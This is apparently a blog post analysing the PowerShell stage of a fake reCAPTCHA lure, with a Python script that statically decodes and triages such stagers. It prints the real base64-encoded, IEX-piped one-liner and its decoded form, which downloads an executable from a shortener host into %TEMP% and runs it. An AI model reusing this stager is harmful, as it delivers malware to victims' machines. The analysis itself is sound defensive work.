Analysis of Fake reCAPTCHA (PowerShell Stage)

Hello friends, in this article we will talk about how to analyze encoded PowerShell code taken from the fake CAPTCHA mentioned in the previous article.

Read the recent blog post: https://reversethemalware.blogspot.com/2025/07/analysis-malicious-recaptcha.html

Malicious PowerShell Code:

[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('cG93ZXJzaGVsbC5leGUgLUNvbW1hbmQgJFByb2dyZXNzUHJlZmVyZW5jZT0nU2lsZW50bHlDb250aW51ZSc7IEludm9rZS1XZWJSZXF1ZXN0IC1VcmkgInJlYnJhbmQubHkvb3BlbkNhcHRjaGEiIC1PdXRGaWxlICRlbnY6VEVNUFxLakdyeU5TdS5leGU7IFN0YXJ0LVByb2Nlc3MgLUZpbGVQYXRoICRlbnY6VEVNUFxLakdyeU5TdS5leGU='))|I`e`X

Decoded Malicious PowerShell Code (CyberChef):



Decoded Malicious Code:

powershell.exe -Command $ProgressPreference='SilentlyContinue'; Invoke-WebRequest -Uri "rebrand[.ly]/openCaptcha" -OutFile $env:TEMP\KjGryNSu.exe; Start-Process -FilePath $env:TEMP\KjGryNSu.exe

This decoded malicious PowerShell code silently downloads KjGryNSu.exe, then executes it from the path where it was dropped in the %TEMP% folder.
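The same decoding step can be done offline without CyberChef. The following Python triage script is an added example, not code from the original article: it statically decodes a one-liner of this shape, strips the backtick obfuscation on the piped command, and reports the download URL (defanged), the drop path, and whether the dropped file is started. The sample input is constructed, and its host and file name are placeholders, not the real indicators.

```python
import base64
import re

# Argument of [Convert]::FromBase64String('...'), as in the one-liner above
B64_CALL = re.compile(r"FromBase64String\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)", re.I)
URI = re.compile(r"-Uri\s+[\"']?([^\s\"';]+)", re.I)
OUTFILE = re.compile(r"-OutFile\s+[\"']?([^\s\"';]+)", re.I)
IEX = re.compile(r"\|\s*(iex|invoke-expression)\b", re.I)


def defang(url):
    """Make a URL non-clickable for reports."""
    return url.replace("http", "hxxp").replace(".", "[.]")


def triage(one_liner):
    """Statically decode the stager; nothing is executed or fetched."""
    m = B64_CALL.search(one_liner)
    if not m:
        return None
    raw = base64.b64decode(m.group(1), validate=True)
    decoded = raw.decode("utf-8", errors="replace")
    # Windows PowerShell drops the backticks in I`e`X, leaving IeX
    tail = one_liner[m.end():].replace("`", "")
    uri, out = URI.search(decoded), OUTFILE.search(decoded)
    drop = out.group(1) if out else None
    compact = decoded.lower().replace(" ", "")
    return {
        "decoded": decoded,
        "pipes_to_iex": bool(IEX.search(tail)),
        "hides_progress": "$progresspreference='silentlycontinue'" in compact,
        "download_url": defang(uri.group(1)) if uri else None,
        "drop_path": drop,
        "runs_drop": bool(drop) and bool(
            re.search(r"Start-Process\b.*" + re.escape(drop), decoded, re.I)),
    }


# Constructed sample with the same shape as the article's one-liner;
# the host and file name are placeholders, not the real indicators.
SAMPLE_CMD = ("powershell.exe -Command $ProgressPreference='SilentlyContinue'; "
              'Invoke-WebRequest -Uri "short.example.invalid/stage2" '
              "-OutFile $env:TEMP\\sample.exe; "
              "Start-Process -FilePath $env:TEMP\\sample.exe")
SAMPLE = ("[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('"
          + base64.b64encode(SAMPLE_CMD.encode()).decode() + "'))|I`e`X")

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```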

 
